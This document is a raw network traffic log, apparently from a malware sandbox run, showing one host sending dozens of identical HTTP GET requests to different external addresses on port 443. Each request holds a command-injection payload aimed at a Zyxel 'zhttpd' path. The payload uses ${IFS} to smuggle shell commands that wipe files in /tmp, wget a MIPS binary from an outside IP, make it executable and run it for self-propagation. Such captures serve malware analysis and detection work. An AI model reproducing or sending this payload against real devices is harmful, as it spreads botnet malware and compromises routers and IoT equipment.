                                    Jan 13, 2024 19:02:37.258207083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5180192.168.2.133660450.156.170.35443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.258274078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5181192.168.2.135287648.112.80.115443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.258317947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5182192.168.2.135580247.89.30.82443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.258369923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5183192.168.2.1355066198.175.143.199443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.258434057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5184192.168.2.1337078108.36.251.62443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.258466959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5185192.168.2.133784471.147.195.57443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.258491039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5186192.168.2.1333866138.200.133.38443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.258538961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5187192.168.2.133458824.84.222.199443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.258608103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5188192.168.2.13557362.53.218.220443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.258683920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5189192.168.2.1346666100.12.17.30443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.258740902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5190192.168.2.1354378202.19.134.92443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.258775949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5191192.168.2.1357918109.239.216.54443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.258836031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5192192.168.2.1357854138.246.184.193443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.258879900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5193192.168.2.135385893.122.186.117443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.258955956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5194192.168.2.1357906187.168.113.187443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.258986950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5195192.168.2.134707227.130.85.136443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.259030104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5196192.168.2.1338762139.205.224.219443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.259109974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5197192.168.2.135927472.67.225.89443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.259174109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5198192.168.2.13567729.130.95.125443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.259238005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5199192.168.2.133304220.214.23.40443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.259268045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5200192.168.2.134349236.242.205.134443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.259320974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5201192.168.2.135181013.126.217.12443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.259382963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5202192.168.2.135713831.138.119.40443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.259382010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5203192.168.2.135293651.193.119.235443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.259437084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5204192.168.2.1360132211.204.204.151443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.259469032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5205192.168.2.1343136166.88.89.119443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.259516001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5206192.168.2.1340744216.234.98.101443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.259546995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5207192.168.2.1338894220.205.92.105443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.259587049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5208192.168.2.1341550186.17.73.71443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.259649038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5209192.168.2.1357638182.163.168.245443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.259706974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5210192.168.2.1349694196.174.110.183443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.259768009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5211192.168.2.136010220.4.49.208443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.259800911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5212192.168.2.1354580171.36.62.135443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.259851933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5213192.168.2.134912891.185.165.122443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.259931087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5214192.168.2.1358096167.126.252.157443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.259962082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5215192.168.2.1343244137.237.67.78443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.260051012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5216192.168.2.135211859.140.129.188443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.260082006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5217192.168.2.135241467.44.85.148443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.260152102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5218192.168.2.1345296156.172.103.153443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.260207891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5219192.168.2.134583488.225.20.233443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.260257959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5220192.168.2.1344674137.148.115.119443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.260339022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5221192.168.2.1358998200.110.74.73443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.260351896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5222192.168.2.1343792198.96.109.71443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.260423899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5223192.168.2.133617827.57.14.136443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.260483027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5224192.168.2.1344692210.17.207.131443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.260540962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5225192.168.2.134125292.73.183.188443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.260600090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5226192.168.2.1336176173.15.231.188443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.260662079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5227192.168.2.1346720213.171.101.145443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.260710955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5228192.168.2.1348840134.116.133.249443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.260788918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5229192.168.2.1354256134.102.108.86443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.260828018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5230192.168.2.135349261.29.158.211443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.260874987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5231192.168.2.134750296.186.13.65443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.260925055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5232192.168.2.1357096205.139.97.208443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.260965109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5233192.168.2.1343674181.138.66.19443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.261018038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5234192.168.2.135968035.25.131.219443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.261059046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5235192.168.2.13498944.230.215.100443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.261120081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5236192.168.2.1340300168.43.251.25443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.261181116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5237192.168.2.134149885.130.177.101443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.261217117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5238192.168.2.1350202153.91.146.89443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.261271000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5239192.168.2.135397061.156.152.197443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.261313915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5240192.168.2.1359618174.207.204.17443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.261379957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5241192.168.2.1347976114.81.92.172443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.261424065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5242192.168.2.1359622189.42.14.73443
                                    TimestampBytes transferredDirectionData
